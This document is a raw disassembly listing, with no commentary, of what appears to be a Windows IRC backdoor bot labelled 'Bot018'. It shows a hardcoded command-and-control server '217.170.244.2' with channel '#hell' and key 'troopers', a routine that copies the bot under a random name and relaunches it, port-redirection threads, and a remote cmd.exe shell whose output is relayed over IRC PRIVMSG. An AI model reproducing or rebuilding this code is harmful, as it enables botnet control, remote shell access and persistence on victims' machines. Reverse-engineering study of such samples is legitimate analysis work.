loc_40D11A: ; CODE XREF: sub_4078FA+583C�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40D13C
test cl, cl
jz short loc_40D138
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40D13C
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40D11A
loc_40D138: ; CODE XREF: sub_4078FA+582A�j
xor ecx, ecx
jmp short loc_40D141
; ---------------------------------------------------------------------------
loc_40D13C: ; CODE XREF: sub_4078FA+5826�j
; sub_4078FA+5834�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40D141: ; CODE XREF: sub_4078FA+5840�j
test ecx, ecx
jz short loc_40D156
loc_40D145: ; CODE XREF: sub_4078FA+5816�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40D10D
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40D156: ; CODE XREF: sub_4078FA+5849�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_C04]
push ecx
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40D18F
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40D18F: ; CODE XREF: sub_4078FA+5878�j
lea eax, [ebp+var_E0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40D19B: ; CODE XREF: sub_4078FA+6F8�j
; sub_4078FA+45F8�j ...
call sub_401CA7
pop ecx
loc_40D1A1: ; CODE XREF: sub_4078FA+32FC�j
pop ecx
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40D1A7: ; CODE XREF: sub_4078FA+1FD�j
; sub_4078FA+210�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_404592
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
xor eax, eax
add esp, 2Ch
inc eax
mov dword_479BB8, eax
jmp loc_407B7E
sub_4078FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D1EF proc near ; CODE XREF: .text:00414AA6�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_402795
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_41F004
call esi
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_479BB0, eax
call esi
push eax
call sub_412D64
pop ecx
call sub_40468E
push 2
call dword_433478
push 7530h
push offset aBot018 ; "Bot018"
push ebx
push ebx
call ds:dword_41F0DC
push eax
call ds:dword_41F0D8
cmp eax, 102h
jnz short loc_40D26E
push 1
jmp loc_40D4CE
; ---------------------------------------------------------------------------
loc_40D26E: ; CODE XREF: sub_40D1EF+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_4334B0
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40D73B
cmp [ebp+var_888], 2
jnz loc_40D735
cmp [ebp+var_887], 2
jnz loc_40D735
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call ds:dword_41F040
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call ds:dword_41F078
push eax
call ds:dword_41F010
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_4141AD
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_413920
add esp, 30h
test eax, eax
jnz loc_40D4D4
cmp dword_42AE54, ebx
mov esi, offset byte_42AED0
jz short loc_40D376
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40D33C: ; CODE XREF: sub_40D1EF+152�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40D33C
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40D376
loc_40D34C: ; CODE XREF: sub_40D1EF+185�j
call sub_412D71
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42AED0[edi], dl
inc edi
loc_40D366: ; CODE XREF: sub_40D1EF+17C�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40D366
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40D34C
loc_40D376: ; CODE XREF: sub_40D1EF+144�j
; sub_40D1EF+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_5 ; "%s\\%s"
push eax
call sub_412BB5
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F06C
cmp eax, 0FFFFFFFFh
jz short loc_40D3B6
push 80h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F0A0
loc_40D3B6: ; CODE XREF: sub_40D1EF+1B3�j
mov esi, ds:dword_41F000
push 7D0h
call esi
mov edi, ds:dword_41F0D4
mov [ebp+var_4], ebx
jmp short loc_40D3F1
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40D1EF+215�j
call ds:dword_41F008
cmp [ebp+var_4], ebx
jnz short loc_40D406
cmp eax, 20h
jz short loc_40D3E3
cmp eax, 5
jnz short loc_40D406
loc_40D3E3: ; CODE XREF: sub_40D1EF+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi
loc_40D3F1: ; CODE XREF: sub_40D1EF+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi
test eax, eax
jz short loc_40D3CE
loc_40D406: ; CODE XREF: sub_40D1EF+1E8�j
; sub_40D1EF+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_40584F
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F0A0
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 41FA76h
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call ds:dword_41F0D0
push eax
push edi
push 100000h
call ds:dword_41F0C4
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_412BB5
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F030
test eax, eax
jz short loc_40D4DA
push 0C8h
call esi
push [ebp+var_24]
mov esi, ds:dword_41F034
call esi
push [ebp+var_20]
call esi
call dword_4335B8
push ebx
loc_40D4CE: ; CODE XREF: sub_40D1EF+7A�j
call ds:dword_41F02C
loc_40D4D4: ; CODE XREF: sub_40D1EF+133�j
mov esi, ds:dword_41F000
loc_40D4DA: ; CODE XREF: sub_40D1EF+2BF�j
cmp dword_479E70, 2
jle short loc_40D522
mov eax, dword_479E74
push dword ptr [eax+4]
call sub_412F42
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call ds:dword_41F0D8
push edi
call ds:dword_41F034
mov eax, dword_479E74
cmp [eax+8], ebx
jz short loc_40D522
push 7D0h
call esi
mov eax, dword_479E74
push dword ptr [eax+8]
call ds:dword_41F0B8
loc_40D522: ; CODE XREF: sub_40D1EF+2F2�j
; sub_40D1EF+31C�j
cmp dword_42AE58, ebx
jz short loc_40D53F
cmp dword_433600, ebx
jnz short loc_40D53F
lea eax, [ebp+var_4F8]
push eax
call sub_401E73
pop ecx
loc_40D53F: ; CODE XREF: sub_40D1EF+339�j
; sub_40D1EF+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_410EEA
lea eax, [ebp+var_E8]
push eax
call sub_401C33
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_479030
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_410EEA
add esp, 2Ch
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_40F005
push ebx
push ebx
call ds:dword_41F00C
imul edi, 234h
cmp eax, ebx
mov dword_43434C[edi], eax
jnz short loc_40D5DB
call ds:dword_41F008
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40D5DB: ; CODE XREF: sub_40D1EF+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401C33
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_478ECC
mov dword_479BBC, ebx
call sub_412C40
mov eax, dword_42AE38
push 3Fh
push offset aHell ; "#hell"
mov esi, offset dword_478F4C
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers ; "troopers"
mov edi, offset dword_478F8C
push edi
call sub_412C40
add esp, 28h
mov dword_479020, ebx
loc_40D635: ; CODE XREF: sub_40D1EF+4EC�j
; sub_40D1EF+4F7�j ...
mov [ebp+var_4], ebx
loc_40D638: ; CODE XREF: sub_40D1EF+4A0�j
cmp dword_433618, ebx
jnz short loc_40D656
push ebx
lea eax, [ebp+var_14]
push eax
call dword_433428
test eax, eax
jnz short loc_40D656
push 7530h
jmp short loc_40D682
; ---------------------------------------------------------------------------
loc_40D656: ; CODE XREF: sub_40D1EF+44F�j
; sub_40D1EF+45E�j
push offset dword_478EC8
mov dword_479BB8, ebx
call sub_40779B
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40D730
cmp dword_479BB8, ebx
jz short loc_40D67D
dec [ebp+var_4]
loc_40D67D: ; CODE XREF: sub_40D1EF+489�j
push 0BB8h
loc_40D682: ; CODE XREF: sub_40D1EF+465�j
call ds:dword_41F000
inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40D638
cmp [ebp+var_8], 2
jz loc_40D730
cmp [ebp+var_C], ebx
jz short loc_40D6E0
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_478ECC
call sub_412C40
mov eax, dword_42AE38
push 3Fh
push offset aHell ; "#hell"
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers ; "troopers"
push edi
call sub_412C40
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D6E0: ; CODE XREF: sub_40D1EF+4AF�j
cmp byte_42AEAC, bl
jz loc_40D635
push 7Fh
push offset byte_42AEAC
push offset dword_478ECC
call sub_412C40
mov eax, dword_42AE3C
push 3Fh
push offset dword_42AEBC
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers_0 ; "troopers"
push edi
call sub_412C40
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D730: ; CODE XREF: sub_40D1EF+47D�j
; sub_40D1EF+4A6�j
call sub_41105B
loc_40D735: ; CODE XREF: sub_40D1EF+A3�j
; sub_40D1EF+B0�j
call dword_4335B8
loc_40D73B: ; CODE XREF: sub_40D1EF+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40D1EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40D744 proc near ; DATA XREF: sub_40D7DF+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_40D799
; ---------------------------------------------------------------------------
loc_40D77E: ; CODE XREF: sub_40D744+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_434344[esi]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_40D7C1
loc_40D799: ; CODE XREF: sub_40D744+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_434348[esi]
call dword_433414
test eax, eax
jg short loc_40D77E
loc_40D7C1: ; CODE XREF: sub_40D744+53�j
push dword_434348[esi]
call dword_4335AC
push [ebp+var_14]
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40D744 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40D7DF proc near ; DATA XREF: sub_40D9BC+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_4334A0
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40D93E
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_4335EC
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_433514
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40D867
lea eax, [ebp+var_13C]
push eax
call dword_433500
jmp short loc_40D875
; ---------------------------------------------------------------------------
loc_40D867: ; CODE XREF: sub_40D7DF+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_433590
loc_40D875: ; CODE XREF: sub_40D7DF+86�j
cmp eax, ebx
jz loc_40D93E
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_40D93E
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_433520
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_412BB5
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_410EEA
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_43433C[eax], ecx
add esp, 20h
lea esi, dword_434344[esi]
mov ecx, [esi]
mov dword_434348[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_40D744
push ebx
push ebx
call ds:dword_41F00C
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40D974
call ds:dword_41F008
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401CA7
pop ecx
pop ecx
loc_40D93E: ; CODE XREF: sub_40D7DF+42�j
; sub_40D7DF+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_434344[eax]
call dword_4335AC
push [ebp+arg_0]
call dword_4335AC
push [ebp+var_4]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014
loc_40D96C: ; CODE XREF: sub_40D7DF+198�j
push 32h
call ds:dword_41F000
loc_40D974: ; CODE XREF: sub_40D7DF+14A�j
cmp [ebp+var_20], ebx
jz short loc_40D96C
jmp short loc_40D992
; ---------------------------------------------------------------------------
loc_40D97B: ; CODE XREF: sub_40D7DF+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_40D93E
loc_40D992: ; CODE XREF: sub_40D7DF+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_433414
cmp eax, ebx
jg short loc_40D97B
jmp short loc_40D93E
sub_40D7DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9BC proc near ; DATA XREF: sub_4078FA+26DC�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_4335EC
push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_4334A0
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40DB1B
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_434344[eax], edi
call dword_43352C
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_433578
test eax, eax
jnz loc_40DB1B
push 0Ah
push edi
call dword_4335C0
test eax, eax
jnz loc_40DB1B
loc_40DA62: ; CODE XREF: sub_40D9BC+BA�j
; sub_40D9BC+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_433464
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40DA62
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_433520
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_410EEA
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43433C[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_40D7DF
push ebx
push ebx
call ds:dword_41F00C
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40DB11
call ds:dword_41F008
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40DB1E
; ---------------------------------------------------------------------------
loc_40DB09: ; CODE XREF: sub_40D9BC+158�j
push 32h
call ds:dword_41F000
loc_40DB11: ; CODE XREF: sub_40D9BC+136�j
cmp [ebp+var_2C], ebx
jz short loc_40DB09
jmp loc_40DA62
; ---------------------------------------------------------------------------
loc_40DB1B: ; CODE XREF: sub_40D9BC+5D�j
; sub_40D9BC+8F�j ...
mov esi, [ebp+arg_0]
loc_40DB1E: ; CODE XREF: sub_40D9BC+14B�j
push esi
call dword_4335AC
push edi
call dword_4335AC
push [ebp+var_3C]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40D9BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DB3D proc near ; CODE XREF: sub_40DB6D+30�p
; sub_40DBAB+85�p ...
mov eax, dword_479BCC
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41F034
jz short loc_40DB51
push eax
call esi
loc_40DB51: ; CODE XREF: sub_40DB3D+F�j
mov eax, dword_479BC8
cmp eax, 0FFFFFFFFh
jz short loc_40DB5E
push eax
call esi
loc_40DB5E: ; CODE XREF: sub_40DB3D+1C�j
mov eax, dword_479C04
cmp eax, 0FFFFFFFFh
jz short loc_40DB6B
push eax
call esi
loc_40DB6B: ; CODE XREF: sub_40DB3D+29�j
pop esi
retn
sub_40DB3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB6D proc near ; CODE XREF: sub_4078FA+34AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_40DB77: ; CODE XREF: sub_40DB6D+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40DB77
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_479BC0
call ds:dword_41F038
test eax, eax
jnz short loc_40DBA6
call sub_40DB3D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40DBA6: ; CODE XREF: sub_40DB6D+2E�j
xor eax, eax
inc eax
leave
retn
sub_40DB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DBAB proc near ; CODE XREF: sub_40DC39+D9�p
; sub_40DC39+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 41FA76h
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_40DBF0
push 0FAh
call ds:dword_41F000
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_412BB5
add esp, 10h
jmp short loc_40DC07
; ---------------------------------------------------------------------------
loc_40DBF0: ; CODE XREF: sub_40DBAB+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 0Ch
loc_40DC07: ; CODE XREF: sub_40DBAB+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_40DC10: ; CODE XREF: sub_40DBAB+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40DC10
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534
test eax, eax
jg short loc_40DC35
call sub_40DB3D
loc_40DC35: ; CODE XREF: sub_40DBAB+83�j
xor eax, eax
leave
retn
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC39 proc near ; DATA XREF: sub_40DDC6+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F0E4
test eax, eax
jz loc_40DD48
jmp short loc_40DC83
; ---------------------------------------------------------------------------
loc_40DC81: ; CODE XREF: sub_40DC39+109�j
xor edi, edi
loc_40DC83: ; CODE XREF: sub_40DC39+46�j
cmp [ebp+var_4], edi
jnz short loc_40DCB3
lea eax, [ebp+var_8]
push eax
push dword_479C04
call ds:dword_41F0E0
test eax, eax
jz short loc_40DCA9
cmp [ebp+var_8], 103h
jnz loc_40DD75
loc_40DCA9: ; CODE XREF: sub_40DC39+61�j
push 0Ah
call ds:dword_41F000
jmp short loc_40DD1A
; ---------------------------------------------------------------------------
loc_40DCB3: ; CODE XREF: sub_40DC39+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40DCCE
loc_40DCBA: ; CODE XREF: sub_40DC39+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_40DD6C
inc eax
cmp eax, [ebp+var_4]
jb short loc_40DCBA
loc_40DCCE: ; CODE XREF: sub_40DC39+7F�j
mov [ebp+var_4], esi
loc_40DCD1: ; CODE XREF: sub_40DC39+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F058
test eax, eax
jz loc_40DD9D
lea eax, [ebp+var_20C]
push eax
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
add esp, 0Ch
loc_40DD1A: ; CODE XREF: sub_40DC39+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F0E4
test eax, eax
jnz loc_40DC81
loc_40DD48: ; CODE XREF: sub_40DC39+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push 1
jmp short loc_40DDBF
; ---------------------------------------------------------------------------
loc_40DD6C: ; CODE XREF: sub_40DC39+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_40DCD1
; ---------------------------------------------------------------------------
loc_40DD75: ; CODE XREF: sub_40DC39+6A�j
call sub_40DB3D
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push edi
jmp short loc_40DDBF
; ---------------------------------------------------------------------------
loc_40DD9D: ; CODE XREF: sub_40DC39+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push 0
loc_40DDBF: ; CODE XREF: sub_40DC39+131�j
; sub_40DC39+162�j
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_40DC39 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDC6 proc near ; CODE XREF: sub_4078FA+421C�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_40DB3D
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_4334C0
test eax, eax
jnz short loc_40DDFD
or eax, 0FFFFFFFFh
jmp loc_40DF72
; ---------------------------------------------------------------------------
loc_40DDFD: ; CODE XREF: sub_40DDC6+2D�j
push ebx
push edi
mov edi, ds:dword_41F0EC
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi
test eax, eax
jnz short loc_40DE30
loc_40DE28: ; CODE XREF: sub_40DDC6+7B�j
; sub_40DDC6+9D�j ...
or eax, 0FFFFFFFFh
